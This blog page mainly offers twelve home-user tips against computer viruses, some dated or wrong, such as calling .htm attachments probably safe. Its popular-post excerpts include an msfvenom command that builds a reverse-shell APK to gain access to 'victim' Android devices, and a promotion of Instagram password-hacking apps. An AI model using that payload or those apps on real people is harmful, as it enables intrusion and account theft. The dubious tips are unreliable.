Skip to main content

12 Tips to maintain a Virus Free Computer.

Is your computer infected with virus? Do you often get mysterious error messages? Well, this is a common problem faced by almost all the computer users across the globe.
Even though some of them are harmless, they do have the ability to do a number of nasty things up to and including damaging or erasing sensitive data from your computer. However, there are ways to keep viruses and other malware away from your computer.

Ways to Keep Your Computer Virus Free:

Here are the 12 tips to maintain a virus free computer:
  1. Email is one of the common ways by which your computer can catch a virus. So, it is always recommended to stay away from SPAM. Open only those emails that has its origin from a trusted source such as those which comes from your contact list.
    If you are using your own private email host (other than Gmail, Yahoo, Hotmail etc.) then it is highly recommended that you use a good spam filter. And finally NEVER click on any links in the emails that comes from untrusted sources.
  2. USB thumb/pen drives is another common way by which viruses spread rapidly. So, it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is the safe way to open a pen drive.
  3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have an efficient antivirus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).
  4. As we all know, Internet is the main source of all malicious programs including viruses, worms, trojans etc. In fact, Internet contributes to virus infection by up to 80 percent. So, here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum possible extent.
    • Do not click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
    • You can also use a pop-up blocker to automatically block those pop-ups.
  5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So, in order to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from those malicious websites.
  6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from viruses. If PC security is your first option then it is recommended that you go for a shareware antivirus software rather than using the freeware stuffs.
    Most of the antivirus programs offer the auto-protect feature that provides real-time security for your PC. Make sure that this feature is turned on.
  7. In addition to an antivirus, it is worthwhile to spend a few bucks on a good anti-spyware program. This can provide extra security for your computer.
  8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still perform a virus scan before opening them.
  9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.
  10. Set up your Windows update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.
  11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.
  12. And finally it is recommended not to visit those websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. as they contribute much in spreading of virus and other malicious programs.

Comments

Popular posts from this blog

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)

Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk). A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection. In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device. Open terminal: msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can ...

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...